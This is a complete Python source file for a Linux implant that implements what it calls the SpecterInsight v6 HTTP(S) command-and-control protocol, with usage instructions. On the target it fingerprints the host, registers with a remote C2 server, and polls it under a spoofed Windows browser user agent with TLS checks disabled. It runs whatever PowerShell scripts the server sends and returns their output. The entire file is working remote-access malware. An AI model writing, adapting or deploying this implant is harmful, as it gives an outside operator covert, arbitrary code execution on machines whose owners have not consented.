#!/usr/bin/env python3
"""
SpecterInsight Linux Implant (Python)
=====================================
Implements the SpecterInsight v6 HTTP(S) C2 protocol for Linux targets.

Protocol:
  - Register:  POST /threads/{sid}/register     (gzip .NET BinaryWriter payload)
  - Poll:      GET  /threads/{sid}/messages?filter={ms}
  - Results:   POST /threads/{sid}/messages     (gzip RunScriptResponse)
  - Errors:    POST /threads/{sid}/notes

Tasks are PowerShell scripts executed via pwsh; results are CLIXML.

Requirements on target:
  - python3 (with requests, urllib3)
  - pwsh (PowerShell 7)  -- install: apt install powershell

Usage:
  SX_URL=https://<c2>:<port> SX_BUILD=<build> python3 sx_linux_implant.py
  python3 sx_linux_implant.py --url https://<c2>:<port> --build <build>

Options:
  --url     C2 callback URL (required)
  --build   Build name registered on the server (must NOT be "default")
  --interval  Callback interval seconds (default 5)
  --window    Jitter window seconds (default 5)
"""

import argparse
import gzip
import hashlib
import os
import random
import shutil
import socket
import struct
import subprocess
import sys
import time
import uuid
from datetime import datetime, timedelta, timezone

import requests
import urllib3
urllib3.disable_warnings()

DEFAULT_USER_AGENT = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
                      "(KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36")
TASK_TIMEOUT = 300


# ------------------------------------------------------------------
# .NET binary serialization (GZip + BinaryWriter layout)
# ------------------------------------------------------------------
def w_string(buf, s):
    data = (s or "").encode("utf-8")
    length = len(data)
    while length >= 0x80:
        buf.append((length & 0x7F) | 0x80)
        length >>= 7
    buf.append(length)
    buf.extend(data)


def w_int32(buf, v):
    buf.extend(struct.pack("<i", v))


def w_bool(buf, v):
    buf.append(1 if v else 0)


def w_timespan(buf, seconds):
    w_int32(buf, 0)
    w_int32(buf, 0)
    w_int32(buf, 0)
    w_int32(buf, seconds)
    w_int32(buf, 0)


def w_datetime(buf, dt):
    epoch = datetime(1, 1, 1, tzinfo=timezone.utc)
    ticks = int((dt - epoch).total_seconds() * 10_000_000)
    buf.extend(struct.pack("<q", ticks | (1 << 62)))


def r_int32(data, off):
    return struct.unpack_from("<i", data, off)[0], off + 4


def r_bool(data, off):
    return bool(data[off]), off + 1


def r_string(data, off):
    length = 0
    shift = 0
    while True:
        b = data[off]
        off += 1
        length |= (b & 0x7F) << shift
        if not (b & 0x80):
            break
        shift += 7
    return data[off:off + length].decode("utf-8", errors="replace"), off + length


class SessionTerminated(Exception):
    pass


# ------------------------------------------------------------------
# Implant
# ------------------------------------------------------------------
class Implant:
    def __init__(self, url, build, interval, window):
        self.url = url.rstrip("/")
        self.build = build
        self.interval = interval
        self.window = window
        self.session_id = uuid.uuid4().hex
        self.host_id = self._host_id()
        self.username = os.environ.get("USER", "unknown")
        self.path = os.path.abspath(sys.argv[0])
        self.pid = os.getpid()
        self.registered = False
        self.http = requests.Session()
        self.http.verify = False
        self.http.headers["User-Agent"] = DEFAULT_USER_AGENT
        self.expiration = datetime.now(timezone.utc) + timedelta(days=365)

    @staticmethod
    def _host_id():
        for p in ("/etc/machine-id", "/var/lib/dbus/machine-id"):
            try:
                if os.path.exists(p):
                    with open(p) as f:
                        return hashlib.sha1(f.read().strip().encode()).hexdigest()
            except Exception:
                pass
        return hashlib.sha1(socket.gethostname().encode()).hexdigest()

    @staticmethod
    def _fqdn():
        return socket.gethostname().upper()

    @staticmethod
    def _os_version():
        try:
            with open("/etc/os-release") as f:
                for line in f:
                    if line.startswith("PRETTY_NAME="):
                        return line.split("=", 1)[1].strip().strip('"')
        except Exception:
            pass
        return f"Linux {os.uname().release}"

    def log(self, msg):
        print(f"[{datetime.now().strftime('%H:%M:%S')}] {msg}", flush=True)

    # ---------------- protocol ----------------
    def register(self):
        buf = bytearray()
        w_string(buf, self.build)
        w_string(buf, self.host_id)
        w_string(buf, "x64")
        w_string(buf, self.session_id)
        w_string(buf, self._fqdn())
        w_string(buf, self._os_version())
        w_string(buf, self.username)
        w_string(buf, self.path)
        w_int32(buf, self.pid)
        w_timespan(buf, self.interval)
        w_timespan(buf, self.window)
        w_datetime(buf, self.expiration)
        body = gzip.compress(bytes(buf))

        resp = self.http.post(f"{self.url}/threads/{self.session_id}/register",
                              data=body, timeout=30)
        if resp.status_code != 200:
            raise RuntimeError(f"register failed: HTTP {resp.status_code} "
                               f"{resp.text[:200]}")
        self.registered = True
        self.log(f"registered session={self.session_id}")
        return self._parse_tasks(resp.content)

    def get_tasks(self, next_checkin):
        offset_ms = max(0, int((next_checkin - datetime.now(timezone.utc)).total_seconds() * 1000))
        resp = self.http.get(
            f"{self.url}/threads/{self.session_id}/messages?filter={offset_ms}",
            timeout=max(30, offset_ms / 1000 + 30))
        if resp.status_code == 404:
            raise SessionTerminated()
        if resp.status_code != 200:
            raise RuntimeError(f"poll failed: HTTP {resp.status_code}")
        return self._parse_tasks(resp.content)

    @staticmethod
    def _parse_tasks(content):
        if not content:
            return []
        try:
            raw = gzip.decompress(content)
        except Exception:
            return []
        if len(raw) < 4:
            return []
        count, off = r_int32(raw, 0)
        tasks = []
        for _ in range(count):
            task_id, off = r_string(raw, off)
            script, off = r_string(raw, off)
            bg, off = r_bool(raw, off)
            text_only, off = r_bool(raw, off)
            tasks.append({"id": task_id, "script": script,
                          "background": bg, "text_only": text_only})
        return tasks

    def run_task(self, task):
        script = task["script"]
        self.log(f"task {task['id'][:8]} running ({len(script)} chars)")
        results, errors = "", []
        try:
            proc = subprocess.run(
                ["pwsh", "-NoProfile", "-NonInteractive", "-Command",
                 f"& {{ {script} }} | ConvertTo-CliXml"],
                capture_output=True, text=True, timeout=TASK_TIMEOUT)
            results = proc.stdout or ""
            if proc.returncode != 0 and proc.stderr:
                errors.append({"type": "RuntimeException",
                               "message": proc.stderr.strip()[:2000],
                               "position": "", "line": "", "count": 1})
        except subprocess.TimeoutExpired:
            errors.append({"type": "TimeoutException",
                           "message": f"timed out after {TASK_TIMEOUT}s",
                           "position": "", "line": "", "count": 1})
        except FileNotFoundError:
            errors.append({"type": "FileNotFoundException",
                           "message": "pwsh not found. Install PowerShell 7 on the target.",
                           "position": "", "line": "", "count": 1})
        except Exception as e:
            errors.append({"type": type(e).__name__, "message": str(e),
                           "position": "", "line": "", "count": 1})

        buf = bytearray()
        w_string(buf, task["id"])
        w_string(buf, results)
        w_int32(buf, len(errors))
        for err in errors:
            w_string(buf, err["type"])
            w_string(buf, err["message"])
            w_string(buf, err["position"])
            w_string(buf, err["line"])
            w_int32(buf, err["count"])
        w_string(buf, "")
        return gzip.compress(bytes(buf))

    def post_results(self, payload):
        resp = self.http.post(f"{self.url}/threads/{self.session_id}/messages",
                              data=payload, timeout=120)
        if resp.status_code == 404:
            raise SessionTerminated()
        resp.raise_for_status()
        self.log("results posted")

    def post_errors(self, messages):
        buf = bytearray()
        w_int32(buf, len(messages))
        for m in messages:
            w_string(buf, m.get("type", "Exception"))
            w_string(buf, m.get("message", ""))
            w_string(buf, m.get("position", ""))
            w_string(buf, m.get("line", ""))
            w_int32(buf, m.get("count", 1))
        try:
            self.http.post(f"{self.url}/threads/{self.session_id}/notes",
                           data=gzip.compress(bytes(buf)), timeout=30)
        except Exception:
            pass

    # ---------------- main loop ----------------
    def run(self):
        while True:
            try:
                if not self.registered:
                    tasks = self.register()
                    for t in tasks:
                        self._handle(t)
                    time.sleep(1)
                    continue

                next_checkin = datetime.now(timezone.utc) + timedelta(
                    seconds=self.interval + random.uniform(0, self.window))
                tasks = self.get_tasks(next_checkin)
                for t in tasks:
                    self._handle(t)

                sleep_for = max(1, (next_checkin - datetime.now(timezone.utc)).total_seconds())
                time.sleep(sleep_for)
            except SessionTerminated:
                self.log("session terminated by server; exiting")
                return
            except requests.exceptions.RequestException as e:
                self.log(f"network error: {e}")
                self.registered = False
                time.sleep(self.interval)
            except Exception as e:
                self.log(f"error: {e}")
                time.sleep(self.interval)

    def _handle(self, task):
        try:
            self.post_results(self.run_task(task))
        except SessionTerminated:
            raise
        except Exception as e:
            self.log(f"task error: {e}")


def main():
    ap = argparse.ArgumentParser(description="SpecterInsight Linux implant")
    ap.add_argument("--url", default=os.environ.get("SX_URL", ""),
                    help="C2 callback URL, e.g. https://1.2.3.4:46722")
    ap.add_argument("--build", default=os.environ.get("SX_BUILD", ""),
                    help="Build name (must not be 'default')")
    ap.add_argument("--interval", type=int,
                    default=int(os.environ.get("SX_INTERVAL", "5")))
    ap.add_argument("--window", type=int,
                    default=int(os.environ.get("SX_WINDOW", "5")))
    args = ap.parse_args()

    if not args.url or not args.build:
        print("ERROR: --url and --build are required (or set SX_URL / SX_BUILD)")
        sys.exit(1)
    if args.build == "default":
        print("ERROR: build 'default' is rejected by the server from non-loopback "
              "addresses. Create a custom build (e.g. 'linux') and use that name.")
        sys.exit(1)

    implant = Implant(args.url, args.build, args.interval, args.window)
    implant.log(f"implant starting host={socket.gethostname()} build={args.build}")
    implant.log(f"callback: {args.url}")
    implant.run()


if __name__ == "__main__":
    main()
